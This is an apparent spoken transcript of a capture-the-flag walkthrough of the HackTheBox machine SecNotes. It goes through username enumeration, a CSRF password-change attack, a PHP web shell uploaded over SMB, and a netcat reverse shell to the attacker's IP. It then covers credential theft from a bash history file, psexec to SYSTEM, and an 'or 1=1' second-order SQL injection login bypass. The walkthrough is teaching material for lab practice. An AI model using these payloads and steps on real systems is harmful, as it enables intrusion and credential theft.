What's going on YouTube? This is IppSec. I'm doing SecNotes from HackTheBox, which was a relatively easy box, but even easier box if you found the unintended SQL injection that lets you bypass the first part of the box, which was a cross-site request forgery type of attack. So you get presented a web application, and you can register a user. You register the user, and upon looking at the features of the site, you see that you can create notes, change your password, and send a note to the admin. If you go to change your password, you'll notice that it doesn't require you to type your old password, doesn't have a cross-site request forgery token, and it's also accessible through a GET request, leaving it to be a really easy cross-site request forgery attack. You send a link to the admin, he clicks it, it changes his password, and then you're presented with a way to drop files on the web server. You drop a web shell, get a low privilege shell, and then go hunting through the box. You'll notice that Bash on Windows is installed. If you pillage through those files, you'll find the administrator password in the Bash history file. So, enough talking, let's just jump in. As always, the first thing we do is run nmap with -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap folder and call it SecNotes, and then the IP address, which is 10.10.10.97. This can take some time to run, so I've already run it. Looking at the results, we see just two ports are open. We have Microsoft IIS on port 80, and it's running HTTPD 10.0, so we know this is going to be like Windows 10 or 2016. And then we also have SMB open, and it's saying Windows 10 Enterprise at 17.134, and we can kind of get a idea of a build date by just Googling this. If we Google that header, we may see like a, well, that's odd. Could crash Firefox, but load this back up and see what happens. I wish I remembered the size of the window. Okay, start a new session. Let's Google this. And do we have 17.134 on this page? We do. So we know this is going to be in the 1803 Redstone 4 April 2018 update. So it's probably sometime between April and October of 2018. So let's just keep moving on. And this information doesn't really look that interesting. We can get the machine name from this NetBIOS computer name, the work group, and that's about it. So let's just go over to 10.10.10.97 and see what the actual website looks like. We have a login form and it just has username and password. So let's try logging with some default usernames like admin password. Let's change this to never save, and we get no account found with that username. Let's try administrator password. Let's try some basic SQL injection. If this is successful, either we'll log in or we'll say, or this error message will move. It does not. So let's try creating an account. Let's create the account IppSec. We'll create the password of password. Logged in. Now let's put the username, IppSec, the password. We'll put something and we get the password you entered is not valid. So we now know we have a way to enumerate valid usernames. So what I'm going to do is send this over into Burp Suite. So if we go here, turn intercept on, do IppSec, please subscribe. Look at Burp Suite. We see it does a post to login. We got a username and password. We don't have any like CSRF tokens to worry about. So let us go to our terminal, wfuzz-h, and we're going to do a wfuzz and try to brute force a bunch of usernames. So let's do wfuzz-c for output with colors. Then the next thing we want to do is specify a word list. So -w, user, share, sec list, usernames, names.txt. Then the next thing we want to do is specify -d for post data. So -d, username is equal to fuzz, and then password is equal to please subscribe. And then the URL, http 10.10.10.97. And we get a bunch of 302s, because I forgot /login.php, I believe. Yep, login.php. And then we need to do probably --hs to hide, I forget what S stands for, but this is going to be hiding if the page contains text. And the text we want to search for is invalid username. So let's turn Burp Suite off. Log in. Put a bad username. No account found. Copy this. Paste this in. And let this go. So our account was IppSec, and we use the password of password. So we can log in. And then let's play with this page. The first thing I notice is we have a username and the email address. So we have a potential user on this application. Let's try new note. Let's do the title of center IppSec /center. And we'll do was here. Save this note. And we can see everything is centered. We do a search on the page for IppSec. We see it is not doing any filtering whatsoever on this HTML. So we can do like cross-site scripting attacks. So if we want to do cross-site scripting attacks, we have to have a way to link to this note. And I don't see a hyperlink to these notes. Let's copy this URL, paste this in, and instead of delete, let's try view. And it just deleted my note. So it doesn't look like we can do anything there. We could send it to wfuzz and try to brute force various things, but my guess is it's not going to be a vulnerability. So let's try other features of this application. Change password. We can change it to please subscribe. And then let's intercept this request. So turn it on, submit it. And let's see, we can drop that one. And now we're at the change pass intercept. And a few things to note is there's no like cross-site request forgery token, just like on login. And then it's also not asking us to confirm our old password. So anyone that goes to this page, you may be able to force them to change their password. So I'm going to send this over into repeater. And we're going to try just hitting go and seeing what happens. If we click render, it doesn't show anything. So let's try change the password to please subscribe to IppSec. And then we're going to change this request method into a get. Click go. And it looks like it updated our password because we don't see any error messages. So let us just go back into Firefox. We can disable burp. We can sign out. That's what my clipboard content is. So log in with IppSec, paste my clipboard, and it did indeed change the password by just going to a URL. So this is looking like it's going to be some type of cross-site scripting challenge just based upon all that. And the fact that it happens in the actual URL is nice because we don't have to do a bunch of JavaScript and have like a JavaScript submit a post request. I forget what video I've done that on. It was one of the very early HackTheBox videos. I'll try to put a link in the comments or description of the video so you can go there if you want to see how to do that type of stuff. But I'm going to keep it easy here. We go to the contact, and let's just see if he follows links. So we're going to send him to our box, which is 10.10.14.2, I believe. And it looks like wfuzz has finished, and the only account it found was Tyler. So if we do nclvnp 9001, actually we wanted to do if config ton 0. Yes, I am 10.10.14.2. Let's direct him to 9001. Send this. and immediately get a connection back. We can see the user agent is Windows PowerShell, which is odd, but I'm guessing that's just because it's coded to immediately navigate to URLs you send to Tyler. So let's see if it actually follows links like on the page. So let's create a new directory, make dir www. And what we're going to do is create test.html. And in this, we're just going to do iframe source is equal to HTTP, or we can just copy and paste. Go to burp, copy this, do HTTP 10.10.10.97 / that. Oh no, V screwed up. There we go. Get rid of this slash. Okay. / iframe. And we'll change the password so we test it ourselves first. And we'll just change it to please subscribe. Okay. Then we just host this Python M simple HTTP server. We'll put it on port 80. So if I go to 10.10.14.2, we have test.html. If I click this, we see password updated. And if I sign out, go here, let's cat test, copy, please subscribe, and try to log in. We get in. So let's host a web service again and send a link over to Tyler. So HTTP 10.10.10 or 10.10.14.2 test HTML, and that's going to direct Tyler to our page. There we go. And if we sign out and sign in as Tyler, it did not work. Let's try this again. IppSec, please subscribe. And let's, instead of sending him through an iframe and all that stuff, maybe PowerShell is not doing that. Let's just send this. Actually, we can verify if this is working. So let's comment this out. And then we can do another iframe. Source is equal to HTTP 10.10.10.90 or 10.10.14.2. Test forward. Host this again. And if we go to the page, if we go to test HTML, we see we get it, and then we send another GET request. So if we send this link over to Tyler, we'll see if he follows it. So contact us, HTTP 10.10.14.2 test HTML. Sent. He gets it, but he doesn't follow the iframe. And that's, again, probably because he is using Windows PowerShell, and this is not an actual web browser, so the logic on it is pretty dumb. So to work with that, all we're going to do is copy the URL that we're trying to direct him to, and go to Contact Us, and send him directly there. So this whole logic thing is also how you know you don't have to do any fancy cross-site scripting, because the web browser is dumb. So let's sign out. Let's try logging in with Tyler. Please subscribe. And we get logged in. We get a note of Mimi's sticky buns that look like a recipe. Years. I don't know that. New site. And we have what looks like to be a SMB share, a username, and a password. So let's test this out with a program called SMB map. So the syntax is SMB map-h, and this should be in Kali if you just apt install it. So let's just search SMB map. Is it? It is. So syntax we want is SMB map -u for username, which is Tyler, -p the password, which is going to be this 92 thing, then -H for the host, and that's 10.10.10.97. It's going to find the SMB ports and then list what shares are available. And we can see there's a share that is new site that is read write. So let's do SMB client -U, the username, %, the password, and then we want 10.10.10.97 new -site. We can do dir, and we see there's an iisstart.html or HTML and iisstart.png. So we have a page. If we try to go to this though, iisstart.html, we get 404 not found. So there's something we're not seeing here. So the first thing I'm going to do is nmap-v. We'll do --max retry, set that to 0. And -v is going to show us open ports as it scans. Max retry 0 is going to make this go a bit faster. We'll do -t5 to make this a super aggressive. And then we just want -p-10.10.10.97. So I'm just checking if there's any ports open on this that we have missed. We have 80.445. And then we can also go over into burp. And if we just do a get on /, click go, we get viewing notes. That's fine. Let's change this to, let's see, is there a host thing? Yep, host here. SecNotes.htb, just in case there's any type of like virtual host routing, because we know the host name of this box is SecNotes.htb, as did nmap tell us that as well. So doing this, we get the same exact page. So chances are there's nothing unique there. Let's go back into terminal. And we don't have any extra ports open yet. And there we go, we have finished. And we have one extra port open, that is 8808. So let's go and check this, 8808. And we get that welcome page. So go back over into the SMB client and let's create various scripts. So let's try a PHP first. So shell.php, and we'll just do PHP system and then get IppSec. Instead of get, we'll do request. So it can be done with post or get requests. And then if we put shell.php /shell.php, a 500 internal server error, IppSec equals who am I, we get SecNotes /Tyler. So we definitely have code execution here. Let us get a reverse shell, and we could either do PowerShell one-liners or we can just upload netcat. I like normally just uploading netcat because I find it handles like the TTYs better. So netcat Windows. Let's go to NC64 Windows. There we go. I always get it from this eternally bored site. Save link as. It's in downloads, that's fine. So move downloads netcat. Okay. Unzip netcat. And we got NC64 as well. So let's put NC64.exe, NCLVNP on port 9001. And then in our shell, we just want to do NC64.exe 10.10.14.2 9001-E PowerShell. If we go back to our terminal, we have a low privilege shell on this box, I believe. If we do who am I, it'll take a while, but it does come back as Tyler. We can do who am I /all, see what tokens we have, and it doesn't look like we have any commonly abusable tokens that would allow us to do like juicy potato. I forget what name that is off the top of my head, but I would have definitely memorized. Oh, it's the, like SE impersonation token. That's what it is. So don't have that. So nothing too interesting there. So let's go cd / cd users Tyler desktop, and then we can do get content user.text, and then measure object dash what is it, character, and we can see user.text is 32 characters long, which is an MD5 sum. We also have some weird stuff like bash.lnk. If we do get content bash.lnk, we do see it is a link that is going to Windows System 32 bash.exe. So we have bash on Windows installed. We just type bash. It looks like our TTY is screwed up, but we are now literally running bash on Windows, and we're in /mount c users Tyler desktop. If we go to just /, we're at the root of the file system. If we do who am I, we're the root user. So let's try, was it mount c, cd users administrator, and we still can't get there. So even though it's showing us as the root user, this is kind of, I guess, just a VM or something because we're not admin on the box. So let's just go to /, and instead of going into mount, let's go into /root file system ls-la. What is file system? File system. It's a directory, ls file system. Looks like it's a blank directory. We do see that .bash history does have contents in it, so let's cat this, and we can see a username and password on this box. And that's the same exact syntax as we had done to access the box as Tyler. So let's just copy this, rename a window to low priv, create a new one, paste this in. Instead of 127.0.0.1, let's do 10.10.10.97. And we're on the box as administrator now. So cd users, administrator, and then we can go into desktop, and then get root.txt. Then we just do wc-c on root.txt, 34 characters. I guess there may be 2 line breaks or something in there, but I can assure you this is the root.txt of the box. So let's go back, exit out of this, and go back to just plain old PowerShell. If you didn't want to execute bash, or you had problems with that TTY, you could always go into app data, local packages, and let's see, where is it? This canonical, and this is going to be where Windows actually installs the VM, or bash on Linux, so bash on Windows, whatever it is, that weird thing that allows you to run bash on Windows. So we can go into this, and then we got root fs, and then we're in that as well. So dir, and then get content bash history, and we can see the same exact thing. So let's see. Here we're just viewing the file system as admin. I do have nmap'ing installed on this, so we can just do ps-exec, and then administrator at 10.10.10.97, copy this password, paste it in, and it looks like it is going to give us a shell in this box. Come on. There we go. And if we do who am I, we are NT authority / system. So that is how you do this box. And let us go and do a little bit extra now. So there is a alternative path. If we went into Firefox, and let's go all the way back to the very beginning of this box. So home, let's sign out, and let's create a new user, and let's do SQL injection in the username. So we'll do please subscribe or 1 = 1. I think that'll work. We'll do password of password. Submit. And then type password. And we get logged in and we have all the notes. And we can see the credentials this way. So let's examine exactly why this works and do a little bit of static code analysis. And the cool thing about this is we see all the notes. This is the notes of Tyler. This is the notes of IppSec. So let us see why this works by downloading all the PHP files. So make dir PHP, go in here, and then run SMB client to log in, do dir. We want to go into inetpub, cd / inetpub, I mistyped it, and then www root, cd inetpub. There we go. cd into www root, and then we'll just get all these files. And now that I did that, I wonder if this has the mget command. mget star.php. That would be an easier way to do it. Just use mget instead of doing what I did and doing gets on every single file. Mget is like multi-get. So now we have all the PHP files. So we can search for things like grep-b for before, -a for after, and then we can search for things like system, star.php, and see if this thing ever calls system. It does not. Let's search for, well, we can do -i as well to make it case insensitive. PowerShell, CMD, SQL, and we get a bunch. So let's see. It looks like generally OXDF is using this $SQL thing, and he does this relatively every time. So we can just search for $SQL to kind of filter out some of the noise, and we can see all the spots where this actually interacts with the database. So we see right here, we're doing SQL, we got question marks here, and prepared statement. So we can ignore this submit note, move up. We have insert into users, username, password, prepared statement, register. Let's see, where's that SQL? Question mark, prepared statement, question mark, prepared statement. And here we have what is equal to username and then does a statement. But if the user can control this value, maybe we have SQL injection here. This is on home.php. Go up to the next one, prepared. Change password is prepared as well. So the only time the creator didn't use a prepared statement is right here. So let's look at home.php, or let's just look at how username gets declared. So let's do the grep again. We'll do username equals, can we, so on register.php, we're setting it to the variable. So this is definitely user controlled right here. Let's see. Auth.php, username is equal to session username. And the session, let's see, how does this get set? DB, username, empty trim. I believe the session is getting it from the post request that the user sends, but we can verify this by just doing another grep. And this time we'll do underscore session space, I think just underscore session. And then let's filter out some of the noise before we do that. So less home.php will require auth and db. So we should be able to do auth.php, db.php, home.php. Actually, since it's a session variable, we need to do them all, because it can write it in any file and then it pulls it from that session. So let's just do this and go through all the noise. So let's see, session, can we specify username? Change these single quotes to double quotes and escape that. There we go. So on login.php, the session is setting session username to this. And if we look at the whole code, we have if the password is correct, start a session, and then write the username that was sent from the user into this. So you have a second order SQL injection, which means it's not a direct access to SQL, but it's pulling it from a tainted resource that then causes the SQL injection. And this is somewhat common when developers go into the mindset of never trusting user input, when the mindset should be never trust any input. Because just because it didn't come directly from the user doesn't mean it wasn't created by the user in the first place. In this case, the user created that database field for the username, and there was a prepared statement around that, so it wasn't injectable, but it just got stored in the database and became a ticking time bomb for when code grabbed it from that database and then used it in a unsanitized way. So hope you guys enjoyed that, and that's the box. Take care, and I will see you all next week.